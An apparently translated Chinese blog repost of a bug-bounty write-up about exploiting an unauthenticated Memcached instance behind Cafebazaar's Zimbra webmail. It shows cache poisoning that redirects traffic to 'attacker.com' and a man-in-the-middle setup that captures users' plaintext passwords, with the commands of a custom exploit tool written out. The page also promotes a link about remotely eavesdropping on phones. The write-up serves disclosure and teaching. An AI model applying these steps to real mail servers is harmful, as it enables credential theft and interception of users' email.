渗透实战!获取2500刀赏金的全过程

admin
admin
admin
101087
文章
87
评论
2022年6月26日23:30:58评论79 views字数 2203阅读7分20秒阅读模式

黑客视频教程限时免费订阅

渗透实战!获取2500刀赏金的全过程

扫码免费看


这篇文章是关于作者和他的朋友如何从Cafebazaar bug赏金计划中获得约2500美元奖励的故事。


渗透实战!获取2500刀赏金的全过程


一.

侦察阶段


在侦察阶段,作者枚举了mailx.hezardastan.net的主机,


即Cafebazaar的网络邮件访问入口。随后扫描了端口,结果如下:

渗透实战!获取2500刀赏金的全过程

开了很多端口,其中,Memcached的11211端口发现异常。

经过一些基本测试,结果表明:


  • 1.无需认证即可与11211端口通信

  • 2.电子邮件地址由Zimbra保存在缓存中

  • 3.具有添加/修改/删除缓存数据的能力

  • 4.有进行DDOS攻击的能力

  • 但是,作者一直在寻找更危险的东西,比如文件泄露,远程命令执行等。


二.

攻击Zimbra


Zimbra源代码(http://suo.im/5DfuGW)


Zimbra将通信协议方案、用户名和后端服务器IP地址保存在Memcached中。在这之前,使用Metasploit中的memcached_extractor模块进行了数据提取(可以手动完成):

渗透实战!获取2500刀赏金的全过程

渗透实战!获取2500刀赏金的全过程

可见结果中跑出很多邮件地址(标红部分),作者可以利用这些电子邮件地址进行网络钓鱼或暴力攻击。但是,作者对漏洞利用仍然不满意。(可傲娇了)


首先看一下Zimbra的工作流程:


  • 1.用户通过其凭据进行身份验证

  • 2.服务器将用户名和后端服务器URL保存在缓存中

  • 3.用户使用Zimbra

  • 4.服务器从缓存中检索后端URL

  • 5.服务器与检索到的URL以及用户数据通信

渗透实战!获取2500刀赏金的全过程

下面举例说明Zimbra是如何将数据保存在缓存中:

route:proto = imapssl;user= [REDUCTED] @ cafebazaar.ir 127.0.0.1:7993
route:proto = pop3ssl; user = [REDUCTED] @ cafebazaar.cloud 127.0.0.1:7995
route:proto = httpssl; user = [REDUCTED ] @ cafebazaar.ir 127.0.0.1:8443


格式为:

route:proto = [UserProtocol]; user =EmailAddressOrID


支持的协议:

IMAPSSL 127.0.0.1:7993
POP3SSL 127.0.0.1:7995
HTTPSSLHTTPS)127.0.0.1:8443


考虑到我们可以通过互联网访问后端服务器:

IMAPSSL mailx.hezardastan.net:7993 
POP3SSL mailx.hezardastan.net:7995 
HTTPSSL(HTTPS)mailx.hezardastan.net:8443


作者设计了一种攻击场景,剩余部分将进行介绍。

渗透实战!获取2500刀赏金的全过程


三.

发现SSRF漏洞


该场景是针对SSRF测试服务器。攻击场景是将后端服务器IP地址更改为任意地址(攻击者的服务器),以便重定向服务器流量。


测试SSRF的步骤:

  • 1.通过自签名SSL证书在某个端口上建立SSL侦听器

  • 2.更改用户的缓存以重定向流量

通过更改缓存,建立起了一个来自maix.hezardastan.net的连接,如下图


渗透实战!获取2500刀赏金的全过程

SSRF已实现:)



四.

中间人攻击


中间人攻击的主要目的是在邮件服务器正常工作时窃取用户信息(包括凭据,电子邮件等)。

为了不影响用户正常使用功能,我们不得不把流量重定向回服务器。


考虑到后端开放端口都可以从互联网访问得到,我们可以实现这个中间人攻击场景。

渗透实战!获取2500刀赏金的全过程



MITM场景:

  • 1.用户登录到其帐户后,后端服务器IP被保存在缓存中

  • 2.攻击者将后端信息更改为他的IP地址

  • 3.Zimbra的流量被重定向到攻击者的服务器上

  • 4.攻击者卸载SSL并提取信息(主要是凭证信息等)

  • 5.攻击者与后端端口建立SSL连接(这些端口是打开的)

  • 6.对用户进行攻击后,攻击者会将缓存恢复为默认值。


作者编写了一个利用代码,其中包含以下几部分:

渗透实战!获取2500刀赏金的全过程


1.提取已经登录的电子邮件地址

python HezarSploit.py -m dumpusers


渗透实战!获取2500刀赏金的全过程



2.伪造IMAPSSL服务器与客户端进行通信

python HezarSploit.py -m mitm --port 4444


将凭证转储到credentials.txt中。


3.修改所有已登录用户(或某个用户)的缓存

python HezarSploit.py -m poisoning --user all --ip attacker.com --port 4444


4.将缓存更改为默认值

python HezarSploit.py -m reset


综合起来,那就是:


在服务器中:

python HezarSploit.py -m mitm --port 4444

渗透实战!获取2500刀赏金的全过程


在本地命令行中:

python HezarSploit.py -m poisoning --user all --ip attacker.com --port 4444

渗透实战!获取2500刀赏金的全过程


结果如下图:

渗透实战!获取2500刀赏金的全过程


作者几乎以纯文本形式获得了所有用户的密码。

样本如下:

渗透实战!获取2500刀赏金的全过程


五.

最后


作者报告了该漏洞,响应很迅速,并在不到一个小时的时间内修复了该漏洞。


几天后,他们给了作者约2.5k的赏金。希望这篇文章对你们有所帮助。

转自:https://0x9.me/NDxRJ


黑客视频教程录播+进内部群+黑客工具+攻防靶场

扫下方二维码直接领各资料

渗透实战!获取2500刀赏金的全过程

扫码免费领资料

渗透实战!获取2500刀赏金的全过程

(正在为你配置合适的助教)


渗透实战!获取2500刀赏金的全过程

往期内容回顾

渗透实战!获取2500刀赏金的全过程


八款白嫖的开发安全测试工具

这3个黑科技网站,让你秒变黑客

手把手教你如何远程监听他人手机

渗透实战!获取2500刀赏金的全过程






原文始发于微信公众号(白帽子左一):渗透实战!获取2500刀赏金的全过程

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月26日23:30:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透实战!获取2500刀赏金的全过程http://cn-sec.com/archives/957590.html

发表评论

匿名网友 填写信息